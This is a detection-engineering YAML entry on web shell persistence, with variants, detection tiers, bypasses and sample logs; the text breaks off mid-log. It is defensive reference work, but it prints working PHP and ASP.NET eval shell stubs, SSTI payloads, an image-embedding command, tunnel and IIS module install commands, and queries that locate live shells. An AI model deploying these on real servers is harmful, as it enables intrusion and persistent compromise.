Files
iimp0ster-detection-chokepo…/chokepoints/persistence/web-shells.yml
T
imposterandClaude Opus 4.8 95bf405759 feat(ci): chokepoint schema validator + link audit, fix bad data
Adds scripts/validate_schema.py and a validate-data.yml PR gate that
checks every chokepoints/*/*.yml against schema/chokepoint-schema.yml:
required fields, enum values, UUIDv4/ISO-date/MITRE-id formats, tactic
folder consistency, and that referenced Sigma paths exist on disk.
(Replaces the validate_schema.py that cp-drafter referenced but was
never created.) Validator tolerates the authored conventions for
Variations.Status and ExpectedFPRate (leading token + detail).

Fixes surfaced by the validator/link audit:
- 2 invalid Ids regenerated as real UUIDv4 (ransomware-service-
  manipulation, remote-execution-tools)
- 4 dead reference citations repaired (Proofpoint moved URL; Trustwave
  via Wayback; Metasploit psexec -> GitHub docs; BleepingComputer had a
  wrong slug -> correct article)

Adds scripts/check_links.py — advisory external-link sweep (not a CI
gate; external links flake). Buckets BROKEN vs BLOCKED vs OK so API
endpoints and bot-blocked blogs are not mistaken for rot.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-06-13 10:09:20 -06:00

619 lines
38 KiB
YAML

Name: Web Shell Persistence
Id: 65bd1e30-9ba0-4815-9953-f063a637feeb
MitreIds:
- T1505.003
- T1190
- T1059.004
Tactics:
- Persistence
- Initial Access
- Execution
Techniques:
- 'Server Software Component: Web Shell'
- Exploit Public-Facing Application
- 'Command and Scripting Interpreter: Unix Shell'
DetectionPriority: CRITICAL
ThreatPrevalence: HIGH
DetectionDifficulty: MEDIUM
Description: 'Adversaries plant web-accessible scripts (web shells) on compromised servers to maintain persistent command
execution via HTTP/HTTPS - present in ProxyLogon, ProxyShell, MOVEit, Barracuda ESG, and Ivanti zero-day campaigns.
Despite diversity in language (PHP/ASP.NET/JSP/Python), encoding (base64, XOR, gzinflate, multi-layer), and evasion
(polyglot files, fileless IIS modules, steganography), the chokepoint is invariant: the web server process must execute
attacker-controlled OS commands by spawning a child interpreter, and that parent-child relationship is kernel-observable
regardless of obfuscation. File-content scanning is insufficient - behavioral detection of the process spawn is required.
'
LastUpdated: '2026-03-07'
Author: '@iimp0ster'
Variations:
- Name: China Chopper
FirstSeen: '2013'
Status: Active
SourceURL: https://cloud.google.com/blog/topics/threat-intelligence/breaking-down-china-chopper-web-shell-part-i/
Notes: 'Minimal two-component design: a one-line server-side stub (often <4KB) and a separate attacker-controlled client.
Supports PHP, ASP, ASP.NET, and JSP. Extremely small footprint makes file-size-based detection ineffective. Used across
the full threat actor spectrum from APT groups to commodity attackers; still actively deployed in 2024-2025 campaigns.
'
VariantId: china-chopper
Command:
Invocation: "# Server stub (ASP.NET - one line):\n<%@ Page Language=\"Jscript\" %><%eval(Request.Item[\"password\"],\"unsafe\");%>\n# Server stub (PHP - one line):\n<?php @eval($_POST['password']);?>\n# Client sends POST with command in password parameter"
Context: 'Minimal <4KB server-side stub. Command execution via eval() of POST parameter. Client-side GUI tool manages connections. Supports PHP, ASP, ASP.NET, JSP.'
Artifacts:
- 'Sysmon EID 1: w3wp.exe spawning cmd.exe or powershell.exe'
- 'Web logs: POST requests to small .aspx/.php files with base64 body'
- 'Sysmon EID 11: Small script file written to web root'
ChokepointMapping: 'Script written to web root → HTTP POST to shell → w3wp.exe spawns cmd.exe → command execution'
- Name: Godzilla
FirstSeen: 2020-Q4
Status: Active
SourceURL: https://github.com/BeichenDream/Godzilla
Notes: 'Created by BeichenDream; requires both a password AND encryption key for C2 communication, providing dual-layer
authentication that prevents accidental discovery by other threat actors. Supports ASP.NET, JSP, and PHP. Actively tracked
by HC3 in November 2024 healthcare sector campaigns; more sophisticated authentication model than China Chopper.
'
VariantId: godzilla
Command:
Invocation: "# Server stub requires password AND encryption key:\n# ASP.NET variant with AES-encrypted command execution:\nstring key = \"3c6e0b8a9c15224a\";\n// AES-encrypted C2 traffic with dual-key auth"
Context: 'Dual-layer authentication (password + encryption key) prevents accidental discovery. AES-encrypted C2 traffic. Created by BeichenDream. Tracked in healthcare by HC3 (Nov 2024).'
Artifacts:
- 'Sysmon EID 1: w3wp.exe spawning cmd.exe (POST-triggered)'
- 'Web logs: Encrypted POST bodies to .aspx/.jsp files'
- 'Network: AES-encrypted HTTP traffic to single endpoint'
ChokepointMapping: 'Encrypted shell deployed → AES-encrypted POST → w3wp.exe spawns interpreter → encrypted response'
- Name: Behinder (Ice Scorpion)
FirstSeen: 2020-Q1
Status: Active
SourceURL: https://github.com/rebeyond/Behinder
Notes: 'Publicly available and actively maintained (GitHub user rebeyond); uses encryption-based C2 communication and randomizes
User-Agent strings to evade network and log analysis. Can load and execute compiled payloads in addition to script commands.
Supports ASP.NET, JSP, PHP. Particularly effective against network-based detection due to encrypted traffic.
'
VariantId: behinder-ice-scorpion
Command:
Invocation: "# PHP server stub (AES-encrypted C2):\n<?php @error_reporting(0);session_start();$key=\"e45e329feb5d925b\";$_SESSION['k']=$key;...eval()...?>\n# Default AES key: e45e329feb5d925b (MD5 of \"rebeyond\", first 16 chars)\n# Client sends AES-encrypted commands"
Context: 'AES-encrypted C2 traffic using hardcoded pre-shared key. Supports PHP, JSP, ASP.NET. Client is a Java JAR. Default key is first 16 chars of MD5("rebeyond").'
Artifacts:
- 'Sysmon EID 1: w3wp.exe / httpd spawning cmd.exe or powershell.exe'
- 'Web logs: POST requests with AES-encrypted bodies (no plaintext visible)'
- 'Network: Randomized User-Agent strings per request from same source'
ChokepointMapping: 'Shell written to web root → AES-encrypted POST → w3wp.exe spawns interpreter → encrypted response'
- Name: AntSword
FirstSeen: '2019'
Status: Active
SourceURL: https://github.com/AntSwordProject/antSword
Notes: Modular client-server webshell framework; remarkably similar architecture to China Chopper but with improved extensibility.
Open source on GitHub. Actively observed in targeted campaigns through 2024-2025.
VariantId: antsword
Command:
Invocation: "# PHP server stub (minimal):\n<?php @eval($_POST['ant']);?>\n# Or obfuscated: <?php $V='ant';$$V=@$_POST[$V];eval($$V);?>\n# Client sends base64-encoded PHP in POST parameter"
Context: 'Modular client-server framework, open source. Architecturally similar to China Chopper with improved extensibility and plugin system. Electron-based client.'
Artifacts:
- 'Sysmon EID 1: w3wp.exe / httpd spawning cmd.exe (POST-triggered)'
- 'Web logs: POST with base64 body to small script file'
ChokepointMapping: 'Script written to web root → POST with base64 payload → web server spawns cmd.exe'
- Name: Neo-reGeorg / reGeorg
FirstSeen: '2017'
Status: Active
SourceURL: https://github.com/L-codes/Neo-reGeorg
Notes: 'HTTP tunnel/proxy webshell that forwards attacker traffic through the compromised server; commonly used for lateral
movement once initial shell access is achieved. Neo-reGeorg is the actively maintained successor. Allows attackers to
proxy traffic to internal network segments not directly reachable from the internet.
'
VariantId: neo-regeorg-regeorg
Command:
Invocation: "# HTTP tunnel - not for command execution but traffic proxying:\npython3 neoreg.py generate -k <password>\npython3 neoreg.py -k <password> -u http://target/tunnel.aspx -p 1080\n# Creates SOCKS5 proxy on attacker localhost:1080"
Context: 'HTTP tunnel/proxy web shell for forwarding traffic through compromised server to internal networks. Neo-reGeorg is the maintained successor to reGeorg.'
Artifacts:
- 'Web logs: High volume of POST requests to single ASPX/PHP file'
- 'Sysmon EID 3: w3wp.exe making connections to internal RFC1918 addresses'
ChokepointMapping: 'Tunnel shell deployed → HTTP POST traffic → web server proxies to internal network → lateral movement'
- Name: LEMURLOOT (MOVEit)
FirstSeen: 2023-Q2
Status: Active
SourceURL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a
Notes: 'C# ASP.NET webshell deployed by CL0P (TA505) via MOVEit Transfer CVE-2023-34362 SQL injection zero-day (May 2023).
Named human2.aspx to masquerade as a legitimate MOVEit file. Exfiltrated data from MOVEit databases and executed arbitrary
commands. Approximately 130 organizations victimized within 10 days; represents the targeted appliance-specific webshell
model deployed by ransomware operators.
'
VariantId: lemurloot-moveit
Command:
Invocation: "# human2.aspx - masquerades as legitimate MOVEit file\n# Accepts commands via X-siLock-Comment header\n# Deployed via CVE-2023-34362 SQLi zero-day"
Context: 'Deployed by CL0P via MOVEit Transfer SQLi zero-day. Named human2.aspx to blend with legitimate human.aspx. 130+ organizations compromised in 10 days.'
Artifacts:
- 'Sysmon EID 11: human2.aspx created in MOVEit web directory'
- 'Sysmon EID 1: w3wp.exe spawning cmd.exe after POST to human2.aspx'
- 'Web logs: Requests with X-siLock-Comment header containing commands'
- 'SQL logs: Anomalous queries from MOVEit application'
ChokepointMapping: 'SQLi writes human2.aspx → HTTP request with X-siLock-Comment → w3wp.exe → cmd.exe → data exfil'
- Name: GLASSTOKEN / BUSHWALK (Ivanti)
FirstSeen: 2024-Q1
Status: Active
SourceURL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b
Notes: 'Webshells deployed against Ivanti Connect Secure appliances via CVE-2023-46805 (auth bypass) and CVE-2024-21887
(command injection). GLASSTOKEN was the initial variant; BUSHWALK, LIGHTWIRE, and CHAINLINE were deployed post-mitigation
bypass. Over 1,700 appliances compromised. Demonstrates the shift from web application webshells to network appliance
webshells. Same parent-child execution pattern, different host OS environment.
'
VariantId: glasstoken-bushwalk-ivanti
Command:
Invocation: "# BUSHWALK - Perl CGI on Ivanti Connect Secure:\n# Deployed to /home/perl/DSLogConfig.pm\n# GLASSTOKEN - Python CGI on Ivanti:\n# Injected into legitimate Python CGI files\n# Uses Ivanti's built-in Perl/Python environments"
Context: 'Deployed via CVE-2024-21887 + CVE-2023-46805 on Ivanti Connect Secure. CISA AA24-060b. Shells use Perl/Python native to the appliance OS.'
Artifacts:
- 'Ivanti logs: Anomalous CGI execution in /home/perl/ or /home/python/'
- 'File integrity: Modified .pm or .py files in Ivanti web directories'
ChokepointMapping: 'Exploit writes shell to Ivanti CGI path → HTTP request → Perl/Python interpreter executes → internal pivot'
- Name: SALTWATER / SEASPY (Barracuda ESG)
FirstSeen: 2023-Q2
Status: Active
SourceURL: https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/
Notes: 'Webshell-style implants deployed by UNC4841 (China-nexus) against Barracuda Email Security Gateway appliances via
CVE-2023-2868 (remote command injection via TAR file). Exploited as zero-day from October 2022; disclosed May 2023. CISA
mandated full appliance replacement; patches were insufficient. Demonstrates webshells surviving factory reset via firmware-level
persistence on physical appliances.
'
VariantId: saltwater-seaspy-barracuda-esg
Command:
Invocation: "# SALTWATER - trojanized Barracuda SMTP daemon module\n# SEASPY - passive backdoor monitoring port 25, activates on magic packet\n# Both persist across firmware updates via modified /etc/init.d/"
Context: 'Deployed by UNC4841 (China-nexus) via CVE-2023-2868. SALTWATER is a trojanized SMTP module. SEASPY is a passive backdoor. Both persist across firmware updates.'
Artifacts:
- 'File integrity: Modified modules in Barracuda firmware directories'
- 'Network: Anomalous SMTP traffic patterns on port 25'
- 'Process: Unexpected child processes from Barracuda SMTP daemon'
ChokepointMapping: 'Exploit injects module into SMTP daemon → crafted SMTP command → daemon spawns shell → command execution'
- Name: Fileless IIS Native Modules
FirstSeen: 2022-Q1
Status: Active
SourceURL: https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/
Notes: 'Malicious IIS native modules (.DLL) that act as request handlers, intercepting all HTTP traffic to the server. Documented
by Microsoft in December 2022; avoids writing script files to web-accessible directories entirely. Detected via IIS module
configuration review rather than file scanning. Same parent-child process relationship (w3wp.exe spawning cmd.exe) applies
when commands are executed.
'
VariantId: fileless-iis-native-modules
Command:
Invocation: "# Installed as native IIS module (C++ DLL):\nappcmd.exe install module /name:\"MyModule\" /image:\"C:\\path\\to\\malicious.dll\"\n# Or via web.config: <modules><add name=\"MyModule\" .../></modules>\n# No script file on disk - runs in-process with w3wp.exe"
Context: 'Documented by Microsoft (Dec 2022). Native C++ IIS modules run in-process with w3wp.exe; no child process for basic operations. Can intercept credentials from HTTP traffic.'
Artifacts:
- 'Sysmon EID 7: Unusual DLL loaded by w3wp.exe'
- 'IIS logs: appcmd.exe install module commands'
- 'Registry: New modules in HKLM\SOFTWARE\Microsoft\InetSrv\Modules'
ChokepointMapping: 'Malicious DLL installed as IIS module → runs in-process with w3wp.exe → intercepts HTTP traffic'
- Name: Polyglot / Steganographic Shells
FirstSeen: 2020-Q1
Status: Active
SourceURL: https://web.archive.org/web/20250805041446/https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hiding-webshell-backdoor-code-in-image-files/
Notes: 'Webshell code embedded in valid image files (GIF89a header + PHP code) or hidden via steganography. Bypass file-type
validation and content inspection. When the web server processes the file as a script, the embedded code executes. Primarily
used to evade upload restrictions; once uploaded, execution behavior is identical to traditional webshells.
'
VariantId: polyglot-steganographic-shells
Command:
Invocation: "# PHP embedded in image EXIF metadata:\nexiftool -Comment='<?php system($_GET[\"cmd\"]); ?>' image.jpg\n# Accessed via LFI: http://target/uploads/image.jpg?cmd=whoami"
Context: 'Shell code hidden inside valid image files that pass upload validation. PHP evaluates embedded code when the file is included by the application.'
Artifacts:
- 'Sysmon EID 11: Image file uploaded to web root with PHP magic bytes'
- 'Web logs: GET/POST to image files with query parameters'
- 'Sysmon EID 1: httpd/php-fpm spawning cmd.exe after request to image'
ChokepointMapping: 'Polyglot image uploaded → HTTP request with parameters → PHP evaluates embedded code → command execution'
- Name: Server-Side Template Injection (SSTI) Webshells
FirstSeen: '2019'
Status: Active
SourceURL: https://portswigger.net/web-security/server-side-template-injection
Notes: 'Injects malicious code into server-side template expressions (Jinja2, Freemarker, Velocity, Thymeleaf, JSP EL) to
achieve RCE without uploading a dedicated shell file. The template engine becomes the execution vehicle. SAP NetWeaver
JSP webshells (April 2025) demonstrated SSTI-based initial access at scale; no traditional shell file exists on disk to
scan.
'
VariantId: server-side-template-injection-ssti-webshells
Command:
Invocation: "# Jinja2: {{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}\n# Twig: {{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"whoami\")}}\n# FreeMarker: <#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"whoami\")}"
Context: 'Exploits template engines to execute code without uploading a file. No persistent file on disk. The shell is the injection payload itself.'
Artifacts:
- 'Web logs: Template syntax in request parameters ({{ }}, <# >, etc.)'
- 'Sysmon EID 1: Web server spawning cmd.exe/sh after template rendering'
ChokepointMapping: 'Template injection in user input → template engine evaluates → web server spawns interpreter → command output'
Prerequisites:
- Write access to a web-accessible directory on the target server (via file upload, path traversal, CVE exploitation, or CMS
compromise)
- OR ability to modify web server configuration (for IIS native module approach)
- Web server must execute the shell's scripting language (PHP, ASP.NET, JSP, etc.)
- HTTP/HTTPS access to the deployed shell from attacker infrastructure
- Server must have OS command execution capability (not hardened to deny shell spawning)
Chokepoints:
- Stage: Shell Deployment
Input: Attacker has write access to web-accessible directory, module registry, or injectable input field
Invariant: Must deploy executable code reachable by the web server. Options are a script file in the web root,
a native DLL loaded as an IIS module, or an injection payload processed by a template engine
Observable: 'Script-based: Sysmon EID 11 showing w3wp.exe/httpd/nginx writing .php/.aspx/.jsp to web root.
Module-based: Sysmon EID 7 showing unusual DLL loaded by w3wp.exe or appcmd.exe install module.
Injection-based: No file artifact. Detected at the execution stage.'
WhyCantBypass: The web server must be able to reach and execute the attacker's code. For file-based shells,
the file must exist on disk. For IIS modules, the DLL must be loaded. For SSTI, the template engine must
process the input. Each path produces a different artifact but all require server-side code execution.
LogSources:
- Sysmon Event ID 11 (File Created)
- IIS / Apache / Nginx access logs
DetectionTier: Research
SigmaRef: sigma-rules/web-shells/research.yml
- Stage: Shell Execution
Input: Web shell file exists on the server
Invariant: An HTTP request to the shell URL causes the web server process to spawn a child OS command interpreter
Observable: 'Sysmon EID 1 showing w3wp.exe / httpd / nginx spawning cmd.exe, powershell.exe, /bin/sh, /bin/bash, or
python. This parent-child relationship is the invariant regardless of shell language or obfuscation.'
WhyCantBypass: The web shell must execute OS commands to be useful. The OS requires a process to run those commands.
That process creation, with a web server parent, is always observable.
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)
DetectionTier: Analyst
SigmaRef: sigma-rules/web-shells/analyst.yml
- Stage: Command Execution / Exfiltration
Input: Child interpreter is running with web server privileges
Invariant: The spawned interpreter executes reconnaissance, lateral movement, or data exfiltration commands
Observable: 'Command-line content from the child process (whoami, ipconfig, net user, certutil downloads).
Network connections from the child process to internal or external targets.'
WhyCantBypass: The entire purpose of a web shell is command execution. The commands must run in a process,
and that process generates telemetry.
LogSources:
- Sysmon Event ID 1 (Process Creation with CommandLine)
- Sysmon Event ID 3 (Network Connection)
DetectionTier: Hunt
SigmaRef: sigma-rules/web-shells/hunt.yml
EvolutionTimeline:
- Date: 2013-2019
Event: China Chopper establishes the minimal webshell model; reGeorg adds tunneling
Change: Two-component design (tiny server stub + attacker client) becomes the dominant pattern; HTTP tunneling via reGeorg
enables lateral movement through the webshell into internal network segments
DetectionImpact: File-size-based detection fails against sub-4KB stubs; keyword/signature scanning becomes the primary but
insufficient detection method
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
- Date: '2020'
Event: NSA/CISA joint advisory published; Microsoft reports 900% increase in web shell detections
Change: Attacker adoption surges; Behinder and Godzilla introduce encrypted C2 and dual-layer authentication; web shells
become primary persistence in commodity and nation-state campaigns alike
DetectionImpact: Network-based detection ineffective against encrypted shells; process parent-child monitoring becomes essential;
parent-child relationship detection begins gaining adoption in EDR and SIEM rules
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
- Date: 2021-Q1
Event: ProxyLogon/ProxyShell plants webshells on hundreds of thousands of Exchange servers
Change: Mass exploitation of CVE-2021-26855 and CVE-2021-34473 drops webshells on every unpatched Exchange server globally
within days; multiple threat actors use the same shells simultaneously
DetectionImpact: File hash detection partially effective but attacker variants proliferate immediately; behavioral detection
of w3wp.exe spawning cmd.exe becomes an urgent priority signal
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
- Date: 2022-Q4
Event: Microsoft documents fileless IIS native module webshells
Change: Malicious IIS DLLs intercept all web traffic with no script file in the web root and no keyword-scannable content;
evades all file-based and directory-monitoring detection approaches
DetectionImpact: File integrity monitoring of web directories insufficient alone; IIS module configuration auditing required;
w3wp.exe child process spawning remains the effective detection signal
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
- Date: 2023-Q2
Event: MOVEit LEMURLOOT and Barracuda SALTWATER/SEASPY deployed on network appliances
Change: CL0P exploits MOVEit zero-day; UNC4841 exploits Barracuda zero-day. Webshells deployed on managed file transfer
platforms and email security appliances rather than traditional web servers. CISA mandates Barracuda appliance replacement.
DetectionImpact: Traditional web server process monitoring insufficient for appliance-specific environments where telemetry
is limited; generic parent-child detection applies where host telemetry is available
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
- Date: 2024-Q1
Event: Ivanti Connect Secure mass exploitation deploys GLASSTOKEN across 1,700+ appliances
Change: CVE-2023-46805 auth bypass + CVE-2024-21887 command injection; webshells survive initial mitigation requiring new
variant deployment (BUSHWALK, LIGHTWIRE); webshell operators actively adapt to defensive response in near-real-time
DetectionImpact: Integrity checking bypass documented; behavioral detection of process execution from appliance services
becomes critical; out-of-band integrity verification required
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
- Date: 2024-Q4
Event: Web shells present in 35% of all IR incidents (Cisco Talos)
Change: Web shell deployment reaches highest observed prevalence; shift toward exploiting unpatched public-facing applications
as primary initial access vector, replacing phishing in many campaigns
DetectionImpact: Organizations without web server process creation monitoring have minimal detection capability; parent-child
process detection must be a baseline capability, not an advanced one
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
- Date: 2025-Q1
Event: Weaver Ant APT reveals multi-year covert access via chained webshells
Change: Chinese-nexus APT maintained persistent access to Asian telecom provider for years using chained webshells as encrypted
tunnels; demonstrates webshells as long-term strategic persistence, not merely an initial foothold tool
DetectionImpact: Periodic file integrity checks insufficient; continuous monitoring of web server process behavior and outbound
network connections required; dormant shells evade activity-based detection during inactive periods
TheConstant: HTTP request → web server process → child OS interpreter
Variants: []
EventType: event
Detections:
- Level: Research
Description: Identify all child processes spawned by web server processes in the environment
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation with CommandLine auditing enabled)
- Linux auditd execve syscall events
Logic: 'Any child process spawned by a web server parent (w3wp.exe, httpd, apache2, nginx, java, tomcat, php-fpm). Run to baseline legitimate administration and deployment patterns.'
ExpectedFPRate: High
UseCase: Baseline legitimate web server child process behavior; identify environments with routine shell spawning (misconfigured)
vs. those with no child process spawning (well-hardened)
SigmaRule: sigma-rules/web-shells/research.yml
- Level: Hunt
Description: Web server process spawning OS shell interpreters or reconnaissance utilities
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Sysmon Event ID 11 (File Created)
- Windows Security Event ID 4688 (Process Creation)
- Linux auditd execve + open syscalls
Logic: 'Web server parent (w3wp.exe, httpd, apache2, nginx, java, php-fpm, tomcat) spawning cmd.exe, powershell.exe, pwsh.exe, wscript.exe, cscript.exe, /bin/sh, /bin/bash, /bin/dash, python*, perl, ruby, whoami.exe, net.exe, ipconfig.exe, ifconfig, id, wget, or curl. OR file create (EID 11) of .php/.asp/.aspx/.jsp/.jspx/.cfm/.shtml under \inetpub\wwwroot\, /var/www/, /srv/www/, or /usr/share/nginx/ by a process outside the approved deployment toolchain.'
ExpectedFPRate: Medium
UseCase: Proactive hunt for active webshell execution and new shell file drops; distinguishes attacker activity from legitimate
server-side scripting
SigmaRule: sigma-rules/web-shells/hunt.yml
- Level: Analyst
Description: Web server spawns shell interpreter with suspicious command AND web-accessible file recently created. Direct
webshell execution signal
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Sysmon Event ID 3 (Network Connection)
- Sysmon Event ID 11 (File Created)
- Windows Security Event ID 4688 (Process Creation)
- IIS/Apache/nginx access logs
Logic: 'Recent (<24h) file create of .php/.asp/.aspx/.jsp/.jspx in a web-accessible path by a process outside approved CMS/deployment tooling, followed within 60 minutes by web server parent (w3wp.exe, httpd, apache2, java) spawning cmd.exe, powershell.exe, /bin/sh, or /bin/bash with CommandLine containing whoami, net user, net group, ipconfig, ifconfig, id, wget, curl, or certutil. Standalone high-confidence: w3wp.exe spawns powershell.exe with -enc, -EncodedCommand, IEX, Invoke-Expression, DownloadString, WebClient, or FromBase64String.'
ExpectedFPRate: Low
UseCase: SOC alerting; immediate IR escalation; highest confidence by correlating shell file creation with subsequent command
execution
SigmaRule: sigma-rules/web-shells/analyst.yml
Intel:
- Name: ShellForge - Adversarial Co-Evolution of Webshell Generation and Detection
Tier: primary
URL: https://arxiv.org/abs/2601.22182
Description: January 2026 paper demonstrating adversarially generated webshells achieve 93.9% evasion rate against VirusTotal
commercial engines; validates behavioral (process-creation) detection over file-content scanning; documents invariant
functional requirements that survive all obfuscation
- Name: NSA/ASD - Detect and Prevent Web Shell Malware
Tier: primary
URL: https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
Description: Foundational April 2020 joint advisory with detection guidance, Splunk queries, Snort rules, and file integrity
monitoring recommendations; establishes process parent-child monitoring as the primary behavioral detection approach
- Name: 'Microsoft - IIS Modules: The Evolution of Web Shells and How to Detect Them'
Tier: primary
URL: https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/
Description: Documents the 2022 shift to fileless IIS native module webshells that bypass file-based detection; explains
why w3wp.exe process behavior monitoring remains effective even against DLL-based shells
- Name: 'MITRE ATT&CK - T1505.003 Server Software Component: Web Shell'
Tier: primary
URL: https://attack.mitre.org/techniques/T1505/003/
Description: Primary technique definition with procedure examples linking to documented threat actor usage; extensive list
of APT groups and ransomware operators observed deploying web shells as persistence mechanism
- Name: Microsoft - Web Shell Attacks Continue to Rise
Tier: primary
URL: https://www.microsoft.com/en-us/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/
Description: Documents the doubling of web shell detections in 2020-2021; includes monthly detection data and attack vector
analysis; establishes process creation monitoring as the most reliable detection approach
RelatedChokepoints:
- remote-execution-tools
- edr-bypass-techniques
OsintSources:
- Platform: Shodan
Query: http.title:"WSO" OR http.title:"b374k" OR http.title:"c99" OR http.title:"FilesMan" OR http.title:"Antak Webshell"
URL: https://www.shodan.io/search?query=http.title%3A%22WSO%22+OR+http.title%3A%22b374k%22+OR+http.title%3A%22c99%22
Notes: Finds internet-exposed web shells with default page titles intact. Common in mass exploitation campaigns where attacker
cadence outpaces cleanup. FilesMan and Antak are additional shells frequently left exposed. Also try http.html:"eval(base64_decode"
to catch obfuscated PHP shells that render without a recognizable title.
- Platform: URLScan
Query: page.title:"WSO" OR filename:shell.php OR filename:webshell.php OR filename:cmd.aspx
URL: https://urlscan.io/search/#page.title%3A%22WSO%22+OR+filename%3Ashell.php
Notes: Finds recently scanned pages presenting known webshell UI or common shell filenames; useful for tracking active campaign
infrastructure and identifying newly deployed shells before cleanup. Add filenames specific to recent campaigns (e.g.,
human2.aspx for LEMURLOOT/MOVEit).
- Platform: VirusTotal Intelligence
Query: tag:webshell positives:0 type:text
URL: https://www.virustotal.com/gui/search/tag%3Awebshell%20positives%3A0%20type%3Atext
Notes: Requires VT Intelligence subscription. Finds webshell samples currently evading all commercial AV detection. These
are the most dangerous variants in active use. Consistent with ShellForge paper (arXiv 2601.22182) finding 93.9% evasion against
commercial engines. Sort by submission date to prioritize the newest evasive variants.
- Platform: Censys
Query: 'services.http.response.body: "eval(base64_decode" and services.http.response.status_code: 200'
URL: https://search.censys.io/search?resource=hosts&q=services.http.response.body%3A+%22eval(base64_decode%22
Notes: Finds web servers returning HTTP 200 responses with the eval(base64_decode PHP obfuscation pattern. This is a near-universal
indicator of a live obfuscated PHP shell. High precision; few legitimate pages contain this pattern. Requires Censys account.
KnownBypasses:
- Bypass: Multi-layer encoding (base64 + gzinflate + XOR + eval) bypasses keyword and signature scanning
Mitigation: Deploy file integrity monitoring against known-good baselines; do not rely on keyword scanning alone
Detection: 'Focus on process behavior, not file content. The encoded shell still executes via eval or assert, and the resulting
OS command still spawns a child process. Shannon entropy analysis of files in web directories can flag highly encoded
content (entropy above 7.0 is suspicious); combine with process creation monitoring for confirmation.
'
- Bypass: Fileless IIS native module webshells write no script file to the web root
Mitigation: Audit IIS module configuration regularly; allowlist approved IIS modules; monitor applicationHost.config for
unauthorized entries
Detection: Sysmon EID 7 (Image Loaded) for unexpected DLLs loaded by w3wp.exe; IIS module list review via appcmd.exe list
module; w3wp.exe child process spawning still occurs when commands execute and remains the reliable detection signal.
- Bypass: Polyglot and steganographic shells bypass file-type validation on upload
Mitigation: Validate file content via magic byte inspection rather than extension or MIME type; restrict script execution
in upload directories (Linux noexec mount, IIS deny-execute permissions)
Detection: File creation events in web directories followed by HTTP requests to those files; web server access logs showing
direct requests to recently uploaded files without an HTTP referrer header
- Bypass: Dormant shells that activate only on demand evade activity-based detection during idle periods
Mitigation: Continuous file integrity monitoring rather than periodic scheduled scans; maintain a cryptographic baseline
of all web-accessible paths
Detection: 'File integrity monitoring detects the shell at rest regardless of activation state. Web server access log analysis
can identify direct requests to unexpected file paths even when no OS command is executed during the request, revealing
attacker reconnaissance.
'
- Bypass: SSTI-based execution requires no uploaded file; it exploits existing template processing
Mitigation: Sanitize all user input before passing to template engines; disable dangerous template evaluation features;
enforce context-aware output encoding
Detection: 'WAF rules for SSTI payload patterns (${{, <%=, #{7*7}); web server access logs showing injection payloads in
request parameters; process spawning from template engine processes (Java Freemarker/Velocity spawning cmd.exe or /bin/sh).'
- Bypass: Encrypted C2 channels (Godzilla, Behinder) bypass network-based detection of webshell traffic
Mitigation: TLS inspection at network boundary; behavioral analysis of HTTP traffic patterns (high POST frequency to a single
endpoint, fixed-interval requests, unusual or rotating User-Agent strings)
Detection: 'Network-layer detection is unreliable against encrypted shells. Process creation monitoring remains effective.
Even Godzilla and Behinder must spawn child processes to execute OS commands. The invariant signal is the endpoint:
w3wp.exe or java spawning cmd.exe or /bin/sh, regardless of how the HTTP command request was encrypted.
'
YaraRules:
- yara-rules/webshell-indicators.yar
RawLogs:
- Type: Sysmon
EventId: 11
Source: Microsoft-Windows-Sysmon/Operational
Description: ASPX web shell file created in IIS web root by non-deployment process
MatchedRules:
- Hunt
- Analyst
Sample: 'EventID: 11 (FileCreate)
UtcTime: 2024-09-03 07:14:32.441
ProcessId: 4
Image: System
TargetFilename: C:\inetpub\wwwroot\upload\cmd8473.aspx
CreationUtcTime: 2024-09-03 07:14:32.441
# File created in web root with .aspx extension by SYSTEM/non-deployment process
# Timestamp correlation: shell accessed via HTTP within 60 minutes of this event
'
- Type: Sysmon
EventId: 1
Source: Microsoft-Windows-Sysmon/Operational
Description: cmd.exe spawned by w3wp.exe after HTTP request to the web shell
MatchedRules:
- Research
- Hunt
- Analyst
Sample: 'EventID: 1 (Process Create)
UtcTime: 2024-09-03 07:18:44.113
ProcessId: 7832
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd /c whoami
CurrentDirectory: C:\Windows\system32\
ParentProcessId: 2840
ParentImage: C:\Windows\System32\inetsrv\w3wp.exe
ParentCommandLine: c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool"
# w3wp.exe → cmd.exe is the canonical IIS web shell execution pattern
# Research rule: any w3wp child; Hunt/Analyst rule: cmd.exe/powershell.exe child
'
- Type: Sysmon
EventId: 1
Source: Microsoft-Windows-Sysmon/Operational
Description: PowerShell with encoded command spawned by w3wp.exe. Encoded web shell execution
MatchedRules:
- Hunt
- Analyst
Sample: 'EventID: 1 (Process Create)
UtcTime: 2024-09-03 07:19:02.774
ProcessId: 8104
